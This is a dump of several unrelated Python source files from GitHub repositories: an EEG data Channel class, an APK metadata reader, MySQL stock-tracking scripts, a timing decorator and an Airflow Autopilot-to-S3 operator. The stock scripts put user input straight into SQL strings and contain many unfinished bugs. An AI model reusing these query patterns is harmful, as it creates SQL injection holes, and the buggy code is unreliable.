integer\") \n if not isinstance(sequence, int) or not isinstance(point, int):\n raise TypeError(\"sequence and point must be integer\")\n if sequence < 0 or sequence >= len(self._seqStartTime):\n raise IndexError(\"sequence (\" + str(sequence) \n + \")is out of the range\")\n\n time = self._getTime(point, self._seqStartTime[sequence], 1) \n index = (time - StartTime).total_seconds()\\\n / (self._frequency * freqMultiplier)\n return round(index)\n\n def GetLocalindex(self, point, StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts global index to a local one. returns \n a tuple (index, sequence).\n If point happens before start of data, sequence will be -1\n If point outside of sequence size, index will be -1\n\n Parameters\n ----------\n point : int\n global index of data point\n StartTime : datetime, optional\n starting time for global index. 
If not set, the channel's\n defined will be used\n freqMultiplier : int, optional\n frequency multiplier for calculation of global frequency\n If not set, channel's defined one will be used\n\n Returns\n -------\n (int, int)\n the tuple (index, sequence) of corresponding local index\n \"\"\"\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n if not isinstance(point, int):\n raise TypeError(\"point must be int\")\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime object\")\n if not (isinstance(freqMultiplier,int) or freqMultiplier > 0):\n raise TypeError(\"freqMultiplier must be a positive integer\") \n time = self._getTime(point, StartTime, freqMultiplier)\n return self._getLocalIndex(time)\n\n def GetTimeFromIndex(self, point, sequence=None, \n StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts local or global index to a corresponding time.\n Parameters sequence and (Starttime, frqMultiplier) are\n mutually exclusive as they used to distinguish between\n local and global index\n\n Parameters\n ----------\n point : int\n index to data point\n sequence : int, optional\n index to a sequence. If set, index will be concidered \n as local\n StartTime : datetime, optional\n the start time for a global index. If not set and \n index is global, channel-defined start time will \n be used\n freqMultiplier : int, optional\n frequency multiplier used for calculating global frequency.\n If not set, channel-defined will be used\n\n Returns\n -------\n datetime\n time corresponding to current index\n\n Raises\n ------\n TypeError\n if passed parameters are of invalid type\n RuntimeError\n if passed parameters are incompatible\n IndexError\n if sequence index is invalid\n \"\"\"\n if sequence is not None:\n if StartTime is not None or freqMultiplier is not None:\n raise RuntimeError(\"parameters sequence and (StartTime, \"\n \"freqMultiplier) are mutually exclusive\")\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n\n if not isinstance(point, int):\n raise TypeError(\"point must be int\")\n if not isinstance(sequence, int):\n raise TypeError(\"sequence must be int\")\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime\")\n if not isinstance(freqMultiplier, int):\n raise TypeError(\"freqMultiplier must be int\")\n\n if sequence is None:\n return self._getTime(point, StartTime, freqMultiplier)\n else:\n if sequence < 0 or sequence > self.GetNsequences():\n raise IndexError(\"sequence out of range\")\n return self._getTime(point, self._seqStartTime[sequence], 1)\n\n def GetLocalIndexFromTime(self, time):\n \"\"\"\n Converts time to local index. If time is before \n the first sequence, returned sequence is set to -1.\n If there no data point at given time, returned index\n will be set to -1\n\n Parameters\n ----------\n time : datetime\n\n Returns\n -------\n (int, int)\n a tuple (index, sequence)\n\n Raises\n ------\n TypeError\n if passed parameter is of invalid type\n \"\"\"\n if not isinstance(time, datetime):\n raise TypeError(\"time must be datetime object\")\n return self._getLocalIndex(time)\n\n def GetGlobalIndexFromTime(self, time, \n StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts time to global index. 
\n\n Parameters\n ----------\n time : datetime\n\n Returns\n -------\n (int, int)\n a tuple (index, sequence)\n\n Raises\n ------\n TypeError\n if passed parameter is of invalid type\n \"\"\"\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n if not isinstance(time, datetime):\n raise TypeError(\"time must be datetime object\")\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime\")\n if not isinstance(freqMultiplier, int):\n raise TypeError(\"freqMultiplier must be int\")\n dt = (time - StartTime).total_seconds()\n return round(dt * self._frequency * freqMultiplier)\n\n def GetValue(self, point, default=0, \n sequence=None, StartTime=None, \n raw=False):\n \"\"\"\n Retrieves value of a particular time point. If given hannel is \n a copy of an original channel, the values are retrieved from \n the original one. In such case the sequences and start times are\n also treated by original channel.\n\n This is virtual function, a particular implementation depends\n on daughter class.\n\n Parameters\n ----------\n point : int \n the index of the point to be retrieved\n If sequence is not given, a global index is used\n point : datetime\n the time of point to be retrieved\n point : timedelta\n the index of the point to be retrieved \n by time passed from beginning of sequence\n default : int, 0\n returned value if asked point not available\n e.g. not in sequence\n sequence : int, optional\n specifies the sequence in which data will be retrieved. \n Points outside given sequence will return default value.\n If pont parameter is given by time, sequence is ignored\n StartTime : datetime, optional\n if point is given by timedelta, specifies the reference time.\n If set to None, the channel-defined value is used.\n If sequence is specified, StartTime is ignored and \n the beginning of given sequence is used as reference\n raw : bool, False\n If set to true, the raw, unscaled value is retrieved\n\n Returns\n ---------\n float or int\n the value of required point\n\n Raises\n --------\n TypeError\n if given parameters are of wrong type\n NotImplementedError\n if class do not implements data retrieval in \n _getValue function\n \"\"\"\n # In case of copied channel, all sequences and times are\n # treated by original channel\n if self._baseChannel != self:\n return self._baseChannel.GetValue(point, default,\n sequence, StartTime, raw)\n\n if not (isinstance(point, int) \n or isinstance(point, datetime) \n or isinstance(point, timedelta)):\n raise TypeError(\"point must be either int, datetime or timedelta\")\n if not (sequence is None or isinstance(sequence, int)):\n raise TypeError(\"sequence must be either None or int\")\n if not isinstance(raw, bool):\n raise TypeError(\"raw must be a bool\")\n\n if sequence is not None:\n if StartTime is not None:\n Logger.warning(\"StartTime is defined together \"\n \"with sequence. StartTime will be ignored\")\n if sequence < 0 or sequence > self.GetNsequences():\n return default\n StartTime = self.GetSequenceStart(sequence)\n if StartTime is None:\n StartTime = self._startTime\n\n # point by time\n if isinstance(point, datetime):\n if sequence is not None:\n Logger.warning(\"sequence parameter is defined \"\n \"but point is passed by absolute time. 
\"\n \"sequence will be ignored\")\n # converting time to index\n point, sequence = self._getLocalIndex(point)\n\n # point by timedelta\n elif isinstance(point, timedelta):\n if sequence is not None:\n point = round(point.total_seconds() * self._frequency)\n if point > self.GetSequenceSize(sequence):\n point = -1\n else:\n point = StartTime + point\n point, sequence = self._getLocalIndex(point)\n\n # point by index\n else:\n if sequence is not None: \n if point > self.GetSequenceSize(sequence):\n point = -1\n else:\n point = self._startTime + timedelta(seconds=point\n / self._frequency)\n point, sequence = self._getLocalIndex(point)\n\n if point < 0 or sequence < 0:\n return default\n\n value = self._getValue(point, sequence)\n if raw:\n return value\n else:\n return self._fromRaw(value)\n\n def GetValueVector(self, timeStart, timeEnd, \n default=0, freq_mult=None, raw=False):\n \"\"\"\n Reads and returns datapoints in range [timeStart, timeEnd[.\n The data point coresponding to timeEnd is not retrieved to avoid\n overlaps in sequential reading. If timeEnd - timeStart < 1/frequency\n no data will be readed.\n\n If given hannel is a copy of an original channel, the values \n are retrieved from the original one. In such case the sequences \n and start times are also treated by original channel.\n\n All values that are output data sequences are filled with \n default value.\n\n This functions calls _getValueVector virtual function\n\n Parameters\n ----------\n timeStart : datetime\n Start time point for reading data\n timeEnd : datetime\n End time point for reading data. Must be equal or bigger than\n timeStart. Data point at timeEnd is not retrieved.\n timeEnd : timedelta\n time range from startTime to be read. Must be positive.\n default : float, 0\n default value for result, if data fals out of sequences\n freq_mult : int, None\n If set, resulting list will be oversampled by this value.\n Each additional cells will be filled with preceeding value\n raw : bool, False\n If set to true, the retrieved values will be unscaled\n\n Raises\n ------\n TypeError\n if passed parameters are of wrong type\n ValueError\n if timeStart is greater than stopTime\n NotImplemented\n if _getValueVector is not implemented for used format\n \"\"\"\n if self._baseChannel != self:\n return self._baseChannel.GetValueVector(timeStart, timeEnd,\n default, freq_mult, raw)\n if not (isinstance(timeStart, datetime)):\n raise TypeError(\"timeStart must be datetime\")\n if not (isinstance(timeEnd, datetime)\n or isinstance(timeEnd, timedelta, float)):\n raise TypeError(\"timeEnd must be either \"\n \"datetime, timedelta or float\")\n if freq_mult is None:\n freq_mult = 1\n if not (isinstance(freq_mult, int)):\n raise TypeError(\"freq_mult must be int\")\n if not (isinstance(raw, bool)):\n raise TypeError(\"raw must be boolean\")\n\n dt = timeEnd\n if isinstance(dt, datetime):\n dt = (dt - timeStart).total_seconds()\n elif isinstance(dt, timedelta):\n timeEnd = timeStart + dt\n dt = dt.total_seconds()\n if dt < 0:\n raise ValueError(\"time span must be positif\")\n\n # total size of data to retrieve\n points = int(dt * self._frequency)\n res = [default] * int(dt * self._frequency * freq_mult)\n seq = -1\n\n for seq_start, seq_size, seq_time\\\n in zip(self._seqStart, self._seqSize, self._seqStartTime):\n seq += 1\n # Sequance starts after end time\n if seq_time >= timeEnd: break\n # offset of sequance start relative to start time\n offset = round((timeStart - seq_time).total_seconds()\n * self._frequency)\n\n # Sequence 
ends before time start\n if (offset) >= seq_size:\n continue\n\n to_read = 0\n # Index to point in res\n index = 0\n read_start = 0\n\n # Case 1: sequence started before timeStart, offset is negative\n # We fill from beginning of res list,\n # but reading data from middle of sequence\n if offset >= 0 :\n # number of points to the end of sequence\n to_read = min(seq_size - offset, points)\n read_start = offset\n\n # Case 2: sequence starts after timeStart, offset is positive\n # We read from start of sequence,\n # but fill in the middle of res vector\n else:\n offset = -offset\n if offset * freq_mult > len(res): break\n to_read = min(seq_size, points - offset)\n index = offset * freq_mult\n\n d = self._getValueVector(read_start, to_read, seq)\n if len(d) != to_read:\n raise Exception(\"Sequence {}: readed {} points, \"\n \"{} expected\".format(\n seq, len(d), to_read))\n for i in range(0, to_read):\n # res[index] = struct.unpack(self.Endian\\\n # + self._Marks[b'\\x20\\x00\\x00\\x00'].Format,\n # data[i:i+self._dataSize])[0]\n res[index] = d[i]\n if res[index] > self._digMax: res[index] = self._digMax\n if res[index] < self._digMin: res[index] = self._digMin\n if not raw:\n res[index] = self._fromRaw(res[index])\n # filling the interpoint space with previous value\n for j in range(index + 1, index + freq_mult):\n res[j] = res[index]\n index += freq_mult\n return res\n\n def _getLocalIndex(self, time):\n \"\"\"\n Retrieves point index and sequence for a given time. If there \n no corresponding index and/or sequence, will return -1 as \n corresponding value.\n\n Do not checks for types\n\n Parameters\n ----------\n time : datetime\n\n Returns\n -------\n (int, int)\n a tuple of (point, sequence). If time is before the start \n of first sequence, sequence will be set to -1, else \n sequence will be the latest sequence before the given time.\n If time is after the sequence end, the index will be set to -1\n \"\"\"\n ind = -1\n seq = -1\n for t in self._seqStartTime:\n if round((time - t).total_seconds()\n * self._frequency) < 0:\n break\n seq += 1\n if seq >= 0:\n ind = round((time - self.GetSequenceStart(seq)).total_seconds()\n * self._frequency)\n if ind >= self.GetSequenceSize(seq):\n ind = -1\n return (ind, seq)\n\n def _getTime(self, point, StartTime, freqMultiplier):\n \"\"\"\n Retrieves time corresponding to a index given starting time \n and frequency multiplier. 
\n\n Do not check for parameters validity\n\n Parameters\n ----------\n point : int\n global index of a data point\n SatrtTime : datetime\n Starting time of data\n freqMultiplier : int\n frequency multiplier to convert channel frequency to \n global one\n\n Returns\n -------\n datetime\n time corresponding to given index\n \"\"\"\n return StartTime + self._getDeltaTime(point, freqMultiplier)\n\n def _getDeltaTime(self, point, freqMultiplier):\n \"\"\"\n Retrieves the time passed since the reference time,\n given data point index and frequency multiplier.\n\n Do not check for parameters validity.\n\n Parameters\n ----------\n point : int\n index of data point\n freqMultiplier : int\n frequency multiplier to convert channel frequency to \n global one\n\n Returns\n -------\n timedelta\n time passed since start\n \"\"\"\n return timedelta(seconds=point / (self._frequency * freqMultiplier))\n\n def _getValue(self, point, sequence):\n \"\"\"\n Retrieves value of a particular time point.\n This is virtual function and will always raise\n NotImplemented error.\n\n The reimplementation of function is not expected to check \n the validity of parameters and ranges.\n\n Parameters\n ----------\n point : int\n the index of the point to be retrieved\n sequence : int\n specifies the sequence in which data will be retrieved\n\n Returns\n -------\n float or int\n the value of required point\n\n Raises\n ------\n NotImplementedError\n if _getValue is not implemented for given format\n \"\"\"\n raise NotImplementedError(\"_getValue\")\n\n def _getValueVector(self, index, size, sequence):\n \"\"\"\n Reads maximum size points from a given sequence\n starting from index. If size is negative, will\n retrieve data till the end of sequence.\n Will stop at end of sequence.\n\n This is virtual function and will always raise\n NotImplemented error.\n\n The reimplementation of function is not expected to check \n the validity of parameters and ranges.\n\n Parameters\n ----------\n index : int\n a valid index from where data will be read\n size : int\n number of data-points retrieved, will not stop if reaches \n end of sequence or end of file\n sequence :\n index of sequence to be read from\n\n Returns\n -------\n list(int)\n a list of readed data\n\n Raises\n ------\n IOError\n if reaches EOF before reading requested data\n NotImplementedError\n if function is not defined for given format\n \"\"\"\n raise NotImplementedError(\"_getValueVector\")\n\n def __lt__(self, other):\n \"\"\"\n Less operator for sorting\n\n Returns\n -------\n bool\n \"\"\"\n return self._name < other._name\n","repo_name":"nbeliy/eegBidsCreator","sub_path":"DataStructure/Generic/Channel.py","file_name":"Channel.py","file_ext":"py","file_size_in_byte":35364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42599506413","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n'''\r\n@author: Spoon\r\n@contact: zxin088@gmail.com\r\n@file: get_apk_info.py\r\n@time: 2019/5/22 9:12\r\n@desc:\r\n aapt d badging filepath/..apk\r\n https://blog.csdn.net/tabactivity/article/details/76992994\r\n'''\r\n\r\n\r\nimport functools\r\nfrom app.libs.read_apk.common.aapt import aapt_tools\r\nimport os\r\nimport re\r\n\r\n\r\ndef log(text):\r\n def decorator(func):\r\n @functools.wraps(func)\r\n def wrapper(*args, **kw):\r\n print('%s %s():' % (text, func.__name__))\r\n return func(*args, **kw)\r\n return wrapper\r\n return decorator\r\n\r\n\r\n@log('call')\r\ndef get_apk_info(apk_path):\r\n if 
apk_path:\r\n output = aapt_tools().badging(os.path.join(os.getcwd(), apk_path))\r\n print('应用名称: %s' % re.findall(r\"application-label:'(.*?)'\", output)[0])\r\n print('应用包名: %s' % re.findall(r\"package: name='(.*?)' \", output)[0])\r\n print('应用版本: %s' % re.findall(r\"versionName='(.*?)' \", output)[0])\r\n else:\r\n print('请按套路出牌!!!')\r\n os.system('pause')\r\n\r\n\r\nif __name__ == '__main__':\r\n get_apk_info(apk_path = input('请输入APK文件路径!!!\\n'))","repo_name":"StickToIdeals/flask_demo","sub_path":"app/libs/get_apk_info.py","file_name":"get_apk_info.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29973714476","text":"#!/usr/bin/env python\n# insert_stocks_cl.py\nimport MakeConnection\n#from mysql.connector import MySQLConnection, Error\nimport configparser\nimport os\nimport time\n#noinspection PyUnresolvedReferences\nimport datetime\n\n\n\n# validate date\ndef validate(date_text):\n try:\n datetime.datetime.strptime(date_text, '%Y-%m-%d')\n return 1\n except ValueError:\n print(\"wrong date\", date_text)\n return 0\n\n\n# find things\nclass Find:\n def __init__(self, conn, m_acct_type, m_fname, m_sacct, m_lacct, m_fid, m_ssymbol, m_qty, m_price, m_fee, m_tdate, m_bs, \\\n m_aid, m_sname, m_agent, m_cszip, m_email, m_phone, m_street, m_sid ):\n # self.name = name # instance variable unique to each instance\n self.conn = conn\n self.m_acct_type = m_acct_type\n self.m_fname = m_fname\n self.m_sacct = m_sacct\n self.m_lacct = m_lacct\n self.m_fid = m_fid\n self.m_ssymbol = m_ssymbol\n self.m_qty = m_qty\n self.m_price = m_price\n self.m_fee = m_fee\n self.m_tdate = m_tdate\n self.m_bs = m_bs\n self.m_aid = m_aid\n self.m_sname = m_sname\n self.m_agent = m_agent\n self.m_cszip = m_cszip\n self.m_email = m_email\n self. 
m_phone = m_phone\n self.m_street = m_street\n self.m_sid = m_sid\n print('conn:', self.conn)\n yn = input('stopping at line 82')\n\n def find_firm(self):\n \"\"\" find aid, stock_symbol, if already in stocks table\"\"\"\n # print(\"aid,stock_symbol\", aid, stock_symbol)\n cursor = self.conn.cursor()\n # m_symbol = input(\"Symbol: \")\n # m_symbol = '%{}%'.format(m_symbol)\n # print(m_symbol)\n sql = \"\"\" SELECT f.FID FROM firms f WHERE f.name like '%s';\"\"\" % self.m_fname\n cursor.execute(sql)\n data = cursor.fetchall()\n\n if len(data) == 0:\n # print(len(data))\n # t = input(\"line: 51\")\n # print('not found')\n print(self.m_name, \" not found...\")\n # yn = '0'\n return 0\n else:\n print(\"ID-----FIRM----------\")\n for row in data:\n print(\"{}\".format(row[1]),\" \",\"{}\".format(row[0]))\n\n def find_account(self):\n cursor = self.conn.cursor()\n \"\"\" find firm name, if already in firm table\"\"\"\n while True:\n\n self.m_lacct = input(\"Enter account number: \")\n self.m_lacct = '%'+self.m_lacct+'%'\n\n # print(val1)\n sql = \"\"\"SELECT aid, long_acct FROM accounts WHERE long_acct LIKE '%s' \"\"\" % self.m_lacct\n cursor.execute(sql)\n data = cursor.fetchall()\n\n if len(data) > 0:\n sfound = 1\n elif len(data) == 0:\n sfound = 0\n return sfound\n if sfound == 1:\n for row in data:\n print(row)\n # answer = input(\"Do you see your \"+msg+\" here (y/n)\")\n # if answer == 'y' or answer == 'Y':\n val = input(\"enter account index number (AID): \")\n return val\n\n\n def find_stock(self):\n \"\"\" find aid, stock_symbol, if already in stocks table\"\"\"\n # print(\"aid,stock_symbol\", aid, stock_symbol)\n print('conn', self.conn)\n yn = input('stopping at line 138')\n\n cursor = self.conn.cursor()\n\n # m_aid = aid\n m_symbol = input(\"Enter symbol : \")\n m_symbol = '%{}%'.format(m_symbol)\n\n while True:\n\n sql = \"\"\"SELECT a.aid, a.long_acct, s.quantity,s.stock_symbol,s.price,s.name,s.trans_date, a.short_acct\\\n FROM (stocks s inner join accounts a on s.aid = a.aid) WHERE stock_symbol LIKE '%s' \"\"\" % self.m_ssymbol\n print(\"AID LACCT QTY SYMBOL PRICE NAME DATE SACCOUNT\")\n try:\n cursor.execute(sql, m_symbol)\n row = cursor.fetchone()\n while row is not None:\n print(\"{0.3f}\".format(row[0]), \"{:25s}\".format(row[1]), \"{0:.3f}\".format(row[2]), \"{:15s}\".format(row[3]), \\\n \"{0.3f}\".format(row[4]), \" \", \"{:25s} \".format(row[5]), \"{:%m/%d/%Y}\".format(row[6]), \"{:25s}\".format(row[7]))\n row = cursor.fetchone()\n except Error as e:\n print(e)\n finally:\n cursor.close()\n\n self.conn.close()\n\n answer = input(\"\\nIf you see your stock lot here enter SID number, search again, or quit, enter (index (SID)/a/q)\")\n val = ' '\n if val == int(answer):\n return val\n elif answer == 'N' or answer == 'n':\n return 0\n elif answer == 'A' or answer == 'a':\n return 'a'\n\n # symbol\n\n\nclass Insert:\n def __init__(self, conn, m_acct_type, m_fname, m_sacct, m_lacct, m_fid, m_ssymbol, m_qty, m_price, m_fee, m_tdate, m_bs, \\\n m_aid, m_sname, m_agent, m_cszip, m_email, m_phone, m_street ):\n # self.name = name # instance variable unique to each instance\n self.conn = conn\n self.m_acct_type = m_acct_type\n self.m_fname = m_fname\n self.m_sacct = m_sacct\n self.m_lacct = m_lacct\n self.m_fid = m_fid\n self.m_ssymbol = m_ssymbol\n self.m_qty = m_qty\n self.m_price = m_price\n self.m_fee = m_fee\n self.m_tdate = m_tdate\n self.m_bs = m_bs\n self.m_aid = m_aid\n self.m_sname = m_sname\n self.m_agent = m_agent\n self.m_cszip = m_cszip\n self.m_email = m_email\n self. 
m_phone = m_phone\n self.m_street = m_street\n\n def create_firm(self):\n self.m_fname = self.m_fname.replace(\"%\", \"\")\n # print('firm name', self.firm_name)\n # yn=input('line 65, wait')\n cursor = self.conn.cursor()\n # this sql actually works!!!!\n sql = \"\"\"INSERT INTO firms (name, street, CityStateZip, Agent, phone, email) VALUES ('%s', '%s', '%s', '%s', '%s', '%s') \"\"\"\n cursor.execute(sql,(self.m_fname, self.m_street, self.m_cszip, self.m_agent, self.m_phone, self.m_email))\n self.conn.commit()\n\n def create_account(self):\n cursor = self.conn.cursor()\n\n sql = \"\"\"INSERT INTO accounts (short_acct, long_acct, acct_type, fid) VALUES ('%s', '%s', '%s' '%s') \"\"\"\n cursor.execute(sql, (self.sacct, self.m_lacct, self.m_acct_type, self.m_fid))\n self.conn.commit()\n\n def insert_stock(self):\n cursor = self.conn.cursor()\n # global g_name\n # need account index (aid)\n sql = \"\"\"INSERT INTO stocks (stock_symbol, name, quantity, price, fee, trans_date, buyorsell, aid) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n cursor.execute(sql, (self.m_ssymbol, self.m_sname, self.m_qty, self.m_price, self.m_fee, self._tdate, self.m_bs, self.m_aid))\n self.conn.commit()\n return cursor.lastrowid\n\n\ndef main():\n muser=''\n mpwd=''\n mhost=''\n mport=0\n mfile=''\n\n a1 = MakeConnection(muser, mpwd, mhost, mport, mfile)\n b = a1.get_config()\n\n # conn = ' '\n a1 = MakeConnection(b[0], b[1], b[2], b[3], b[4])\n print(b[0])\n yn = input('stopping at line 235')\n conn = a1.create_connection()\n print('conn', conn)\n yn = input('stopping at line 238 ')\n\n m_acct_type = ''\n m_fname = ' '\n m_sacct = ''\n m_lacct = ''\n m_fid = 0\n m_ssymbol = ''\n m_qty = 0\n m_price = 0\n m_fee = 0\n m_tdate = ' '\n m_bs = ''\n m_aid = 0\n m_sname = ' '\n m_agent = ''\n m_cszip = ''\n m_email = ''\n m_phone = ''\n m_street = ''\n m_sid = 0\n\n mFind1 = Find(conn, m_acct_type, m_fname, m_sacct, m_lacct, m_fid, m_ssymbol, m_qty, m_price, m_fee, m_tdate, m_bs, m_aid, m_sname, m_agent, m_cszip, m_email, m_phone, m_street, m_sid)\n while True:\n\n # mFind = Find\n while True:\n answer = mFind1.find_stock()\n if answer == 1:\n print('Stock lot on file')\n elif answer == 0:\n print(\"stock lot not found in database: \")\n time.sleep(2)\n Insert.insert_stock()\n elif answer == 'a':\n continue\n else:\n yn = input('[r] repeat,[q]quit')\n if yn == 'q' or yn == 'Q':\n break\n\n yn = input('Use another account? 
(y/n)')\n if yn == 'n' or yn == 'N':\n conn.close()\n break\n\n\n\nif __name__ == '__main__':\n main()\n os.system('clear')\n","repo_name":"jimby/cliStocks","sub_path":"insert_stocks_cl.py","file_name":"insert_stocks_cl.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29973652606","text":"\nfrom mysql.connector import (connection)\n# import importlib\nimport configparser\n# import find_menuNew\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nmuser = config['DEFAULT']['muser']\nmpwd = config['DEFAULT']['mpwd']\nmhost = config['DEFAULT']['mhost']\nmport = config['DEFAULT']['mport']\nmfile = config['DEFAULT']['mfile']\nprint(muser)\n# yn=input(\"stop at line 14\")\n\nclass FindFirm:\n\n def __init__(self, name):\n self.name = name # instance variable unique to each instance\n\n def create_connection(db_user, db_pwd, db_host, db_port, db_file):\n try:\n conn = connection.MySQLConnection(user=db_user, password=db_pwd, host=db_host, port=db_port, database=db_file)\n cursor = conn.cursor()\n return conn\n except Exception as e:\n return e\n \n\n def find_firm(conn, m_var):\n \"\"\" find aid, stock_symbol, if already in stocks table\"\"\"\n # print(\"aid,stock_symbol\", aid, stock_symbol)\n cursor = conn.cursor()\n # m_symbol = input(\"Symbol: \")\n # m_symbol = '%{}%'.format(m_symbol)\n # print(m_symbol)\n sql = \"\"\" SELECT f.name, f.FID FROM firms f WHERE f.name like '%s';\"\"\" % m_var \n # sql = \"\"\"SELECT s.sid, s.stock_symbol,s.quantity,s.name, s.price,p.prices, a.long_acct, s.transwer_date FROM ((stocks s inner join accounts a on s.aid=a.aid) inner join prices p on s.sid=p.sid) WHERE s.stock_symbol like '%s' \"\"\" % m_firm\n # sql = \"\"\"select s.sid, s.price from stocks s where s.stock_symbol like '%s';\"\"\" % m_symbol\n cursor.execute(sql)\n data = cursor.fetchall()\n\n if len(data) == 0:\n # print(len(data))\n # t = input(\"line: 51\")\n # print('not found')\n print(m_var, \"not found...\")\n # yn = '0'\n return 0\n else:\n print(\"ID-----FIRM NAME\")\n for row in data:\n print(\"{}\".format(row[1]),\" \",\"{}\".format(row[0]))\n\ndef main():\n \n d = FindFirm\n\n conn = d.create_connection(muser, mpwd, mhost, mport, mfile)\n\n while True:\n m_var = input(\"Firm: \")\n m_var = '%{}%'.format(m_var)\n if m_var == \"%%\":\n break\n d.find_firm(conn, m_var)\n yn = input('Continue (y/n)')\n if yn == 'n':\n break\n exit \n\n\nif __name__ == '__main__':\n main()\n # import sys\n # find_menuNew\n\n","repo_name":"jimby/cliStocks","sub_path":"find_firm.py","file_name":"find_firm.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32455723540","text":"import functools\r\nimport datetime\r\nimport time\r\n\r\ndef timeit(filepath:str)->callable:\r\n def decor(func: callable) -> callable:\r\n @functools.wraps(func)\r\n def wrapper(*args, **kwargs):\r\n start = time.time()\r\n func(*args, **kwargs)\r\n print('estimation time for ', func.__name__, ':', time.time()-start)\r\n with open(filepath, \"a\") as fl:\r\n fl.write(\r\n f'func call time:{datetime.datetime.now()} estimation time for ,func_name :{func.__name__},:,{time.time()-start}\\n')\r\n return wrapper\r\n return decor\r\n\r\n@timeit('aa.txt')\r\ndef foo():\r\n time.sleep(2)\r\n print('foo is called')\r\n\r\n\r\n@timeit('bar.txt')\r\ndef bar():\r\n time.sleep(4)\r\n print('bar is called')\r\n\r\n\r\nif __name__ 
== \"__main__\":\r\n bar()\r\n foo()\r\n","repo_name":"gyulambaryanartur/Python-Adwanced","sub_path":"decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36236201123","text":"from airflow.utils.decorators import apply_defaults\n\nfrom airflow.models import BaseOperator\nfrom airflow.hooks.S3_hook import S3Hook\n\nfrom autopilot_plugin.hooks.autopilot_hook import AutopilotHook\n\nfrom tempfile import NamedTemporaryFile\nimport json\n\n\nclass AutopilotToS3Operator(BaseOperator):\n \"\"\"\n Autopilot to S3 Operator\n :param autopilot_conn_id: The Airflow connection id used to store\n the Airflow credentials.\n :type autopilot_conn_id: string\n :param autopilot_resource : Resource to call. Possible values are:\n - lists\n - smart_segments\n - contacts/custom_fields\n - triggers\n Leave blank if you want to list all contacts.\n :type autopilot_resource: string\n :param payload: *(optional)* payload to send with request.\n :type payload: dict\n :param results_field: *(optional* the field with the results from\n the api's response. Default to \"contacts\",\n if contacts field is true else defaults\n to the resource's name\n :type results_field: string\n :param ids: *(optional)* ids for the api call\n (for smart_segments)\n :type ids: array\n :param contacts: *(optional)* true if the operator should get\n all contacts from resource.\n Defaults to false\n :type contacts: boolean\n :param s3_conn_id: The Airflow connection id used\n to store the S3 credentials.\n :type s3_conn_id: string\n :param s3_bucket: The S3 bucket to be used\n to store the Autopilot data.\n :type s3_bucket: string\n :param s3_key: The S3 key to be used to store\n the Autopilot data.\n :type s3_bucket: string\n \"\"\"\n template_field = ('s3_key', )\n\n @apply_defaults\n def __init__(self,\n autopilot_conn_id,\n autopilot_resource='',\n results_field=None,\n ids=None,\n contacts=False,\n s3_conn_id=None,\n s3_bucket=None,\n s3_key=None,\n payload=None,\n *args,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.autopilot_conn_id = autopilot_conn_id\n self.autopilot_resource = autopilot_resource\n self.results_field = results_field\n self.ids = ids\n self.contacts = contacts\n self.s3_conn_id = s3_conn_id\n self.s3_bucket = s3_bucket\n self.s3_key = s3_key\n self.payload = payload\n\n if self.autopilot_resource.lower() not in ('lists',\n 'smart_segments',\n 'contacts/custom_fields',\n 'triggers'):\n raise Exception('Specified Autopilot resource not currently supported.')\n\n def execute(self, context):\n hook = AutopilotHook(http_conn_id=self.autopilot_conn_id)\n\n results = []\n\n if self.ids:\n for id in self.ids:\n id_endpoint = \"{}/{}\".format(self.autopilot_resource, id)\n\n if self.contacts:\n results += self.get_all_contacts(hook,\n id_endpoint,\n data=self.payload\n )\n else:\n results += self.get(hook,\n id_endpoint,\n data=self.payload\n )\n elif self.contacts:\n results += self.get_all_contacts(hook,\n self.autopilot_resource,\n data=self.payload\n )\n else:\n results += self.get(hook,\n self.autopilot_resource,\n results_field=self.results_field,\n data=self.payload\n )\n\n with NamedTemporaryFile(\"w\") as tmp:\n for result in results:\n tmp.write(json.dumps(result) + '\\n')\n\n tmp.flush()\n\n dest_s3 = S3Hook(s3_conn_id=self.s3_conn_id)\n\n dest_s3.load_file(\n filename=tmp.name,\n key=self.s3_key,\n bucket_name=self.s3_bucket,\n replace=True\n )\n\n 
dest_s3.connection.close()\n\n def get_all_contacts(self,\n hook,\n resource,\n data=None,\n headers=None,\n extra_options=None):\n \"\"\"\n Get contacts from all pages.\n \"\"\"\n all_pages = []\n total_contacts = -1\n next_token = None\n\n while len(all_pages) != total_contacts:\n if not next_token:\n result = hook.run('{}/contacts'.format(resource),\n data,\n headers,\n extra_options).json()\n else:\n result = hook.run('{}/contacts/{}'.format(resource, next_token),\n data,\n headers,\n extra_options).json()\n\n all_pages += result.get('contacts', None)\n\n total_contacts = result.get('total_contacts', None)\n\n if 'bookmark' in result:\n next_token = result.get('bookmark', None)\n\n return all_pages\n\n def get(self,\n hook,\n endpoint,\n results_field=None,\n data=None,\n headers=None,\n extra_options=None):\n\n result = hook.run(endpoint, data, headers, extra_options).json()\n if not results_field:\n results_field = endpoint\n\n if results_field in result:\n return result.get(results_field)\n else:\n return 